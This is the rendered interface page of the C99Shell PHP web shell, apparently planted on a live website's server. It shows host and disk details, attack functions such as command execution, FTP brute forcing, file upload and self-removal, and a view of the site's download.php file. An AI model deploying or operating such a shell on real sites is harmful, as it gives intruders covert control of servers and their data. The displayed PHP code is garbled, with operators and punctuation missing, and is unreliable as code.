!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/data/   drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     download.php (2.1 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * not used anymore
 */
exit();

@ini_set("display_errors","1");
@ini_set("display_startup_errors","1");

require_once("include/dbcommon.php");

$table postvalue("table");
$strTableName GetTableByShort($table);

if (!checkTableName($table))
{
    exit(0);
}

require_once("include/".$table."_variables.php");


if(!isLogged() || !CheckSecurity(@$_SESSION["_".$strTableName."_OwnerID"],"Search"))

    HeaderRedirect("login"); 
    return;
}

$field postvalue("field");

//    check permissions
if(!$gSettings->checkFieldPermissions($field))
    return;
    
$fieldsArr $gSettings->getFieldsList();    

foreach ($fieldsArr as $f)
{
    $fViewFormat $gSettings->getViewFormat($f);
    if ($field == $f && ($fViewFormat != FORMAT_FILE && $fViewFormat != FORMAT_AUDIO && $fViewFormat != FORMAT_VIDEO))
    {
        exit(0);
    }
}

$_connection $cman->byTable$strTableName );

//    construct sql
$keysArr $gSettings->getTableKeys();
$keys = array();
foreach ($keysArr as $ind=>$k)
{    
    $keys[$k]=postvalue("key".($ind+1));
}
$where KeyWhere($keys$table);


if ($gSettings->getAdvancedSecurityType() == ADVSECURITY_VIEW_OWN)
{
    $where=whereAdd($where,SecuritySQL("Search"$strTableName));    
}

$sql $gQuery->gSQLWhere($where);
$qResult $_connection->query$sql );
if(!$qResult)
  return;
  
$data $qResult->fetchAssoc();
if(!$data)
    return;

$filename $data[$field];
$ext substr($filenamestrlen($filename)-4);
$ctype getContentTypeByExtension($ext);

if($gSettings->isAbsolute($field))
    $absFileName $gSettings->getUploadFolder($field).$filename;
else
    $absFileName getabspath($gSettings->getUploadFolder($field).$filename);
            
// if no file exists return 404 err
if (!file_exists($absFileName))
{
    returnError404();
    exit();
}
// get file size
$strfilesize filesize($absFileName);
if($strfilesize===FALSE)
{
    returnError404();
    exit();
}

header("Content-Type: ".$ctype);
header("Content-Disposition: attachment;Filename=\"".$filename."\"");
header("Cache-Control: private");
SendContentLength($strfilesize);
printfile($absFileName);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0017 ]--